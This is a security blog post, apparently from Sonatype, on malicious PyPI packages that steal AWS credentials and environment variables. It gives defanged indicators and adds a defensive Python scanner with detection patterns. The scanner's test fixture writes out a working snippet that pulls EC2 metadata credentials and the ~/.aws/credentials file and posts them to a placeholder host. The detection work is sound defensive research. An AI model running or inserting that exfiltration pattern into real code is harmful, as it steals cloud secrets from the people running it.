Last week, Sonatype discovered multiple Python packages that not only exfiltrate your secrets (AWS credentials and environment variables) but also upload them to a publicly exposed endpoint.
These packages were discovered by Sonatype’s automated malware detection system, offered as a part of Nexus platform products, including Nexus Firewall. On a further review, we deemed these packages malicious and reported them to PyPI.
These malicious packages, assigned sonatype-2022-3475 and sonatype-2022-3546, are:
As analyzed by Sonatype security researchers Jorge Cardona and Carlos Fernández, some of these packages either contain code that reads and exfiltrates your secrets or depend on one of the other packages that does the job.
For example, the ‘loglib-modules’ and ‘pygrata-utils’ packages contain malicious code, part of which is shown below.
Line 21 connects to a 169.254 IP address, which belongs to the link-local IP range and is used by Amazon EC2 instances to provide the EC2 Instance Metadata Service.
The URL hxxp://169.254.169[.]254/latest/meta-data/iam/security-credentials/ is known to return IAM role information pertaining to an EC2 cloud instance.
Subsequent lines of code (lines 22-26) read AWS credentials, network interface information, and environment variables.
The script then attempts to upload the collected credentials and metadata to one or more endpoints hosted on the PyGrata domain:
hxxp://graph.pygrata[.]com:8000/upload
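The behaviour described above (an IMDS lookup, a read of local AWS credentials, a dump of the environment, and an outbound upload) is a combination that a package-screening step can flag before installation. The scanner below is an added example written for this post, not Sonatype's detection system or code from the packages: it parses a module with Python's `ast`, records each indicator separately, and only rates the module suspicious when collection and sending occur together, so a package that merely posts telemetry or reads one environment variable is not flagged. Both fixtures are constructed test inputs; the upload hostname `collector.example` and the benign API host are placeholders.

```python
import ast
import re
from dataclasses import dataclass, field
from typing import Optional

# Indicator patterns. The link-local IMDS address and the AWS credential
# locations are the ones the post describes; the call names are common
# HTTP senders. Aliased imports (from os import environ) are not tracked.
IMDS_RE = re.compile(r"169\.254\.169\.254")
CRED_RE = re.compile(r"\.aws[/\\]credentials|AWS_(SECRET_ACCESS_KEY|ACCESS_KEY_ID|SESSION_TOKEN)")
SENDERS = {"requests.post", "requests.put", "urllib.request.urlopen", "httpx.post", "httpx.put"}
LOOKUP_ATTRS = {"get"}  # os.environ.get("X") is a single lookup, not an enumeration


@dataclass
class ScanResult:
    imds: bool = False       # references the EC2 Instance Metadata Service address
    creds: bool = False      # references the AWS credentials file or AWS_* key names
    env_dump: bool = False   # uses os.environ as a whole mapping (dict(), .items(), ...)
    outbound: set = field(default_factory=set)     # targets of data-sending HTTP calls
    evidence: list = field(default_factory=list)   # (line, description) pairs

    @property
    def suspicious(self) -> bool:
        # Collecting alone or sending alone is normal in many packages;
        # the combination is what the post describes.
        return (self.imds or self.creds or self.env_dump) and bool(self.outbound)


def _dotted(node) -> Optional[str]:
    """Turn an Attribute/Name chain such as requests.post into 'requests.post'."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None


def scan_source(src: str) -> ScanResult:
    """Statically scan one Python module's source for the indicator combination."""
    tree = ast.parse(src)
    parents = {}
    for parent in ast.walk(tree):
        for child in ast.iter_child_nodes(parent):
            parents[child] = parent
    res = ScanResult()
    for node in ast.walk(tree):
        if isinstance(node, ast.Constant) and isinstance(node.value, str):
            if IMDS_RE.search(node.value):
                res.imds = True
                res.evidence.append((node.lineno, "IMDS address literal"))
            if CRED_RE.search(node.value):
                res.creds = True
                res.evidence.append((node.lineno, "AWS credential reference"))
        elif isinstance(node, ast.Call) and _dotted(node.func) in SENDERS:
            arg = node.args[0] if node.args else None
            target = arg.value if isinstance(arg, ast.Constant) and isinstance(arg.value, str) else "<dynamic>"
            res.outbound.add(target)
            res.evidence.append((node.lineno, f"outbound send to {target}"))
        elif isinstance(node, ast.Attribute) and _dotted(node) == "os.environ":
            parent = parents.get(node)
            single_lookup = isinstance(parent, ast.Subscript) or (
                isinstance(parent, ast.Attribute) and parent.attr in LOOKUP_ATTRS)
            if not single_lookup:
                res.env_dump = True
                res.evidence.append((node.lineno, "whole-environment access"))
    return res


# Constructed fixture mirroring the behaviour described in the post; it is a
# test input for the scanner, not code taken from the packages.
SUSPICIOUS_SAMPLE = '''
import os, requests
meta = requests.get("http://169.254.169.254/latest/meta-data/iam/security-credentials/").text
creds = open(os.path.expanduser("~/.aws/credentials")).read()
requests.post("http://collector.example/upload", json={"m": meta, "c": creds, "e": dict(os.environ)})
'''

# Constructed benign fixture: sends data, but reads one variable rather than the environment.
BENIGN_SAMPLE = '''
import os, requests
token = os.environ.get("API_TOKEN")
requests.post("https://api.example.com/v1/events", json={"ok": True}, headers={"Authorization": token})
'''

if __name__ == "__main__":
    for name, src in (("suspicious", SUSPICIOUS_SAMPLE), ("benign", BENIGN_SAMPLE)):
        r = scan_source(src)
        print(name, "SUSPICIOUS" if r.suspicious else "ok", sorted(r.evidence))
```

Run over every `.py` file in a wheel or sdist (setup.py included, since install hooks are a common place for this code) the evidence lines give a reviewer the exact statements to inspect. The scanner is deliberately conservative and will miss obfuscated or string-built addresses; it is a triage filter, not a replacement for the behavioural analysis the post describes.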
The purpose behind the use of the PyGrata[.]com domain and the names of some of the malicious packages (pygrata-utils) wasn’t immediately clear to us.
Interestingly though, our researchers noticed the endpoints collecting these credentials were exposing this data to just about anyone on the (Read more …)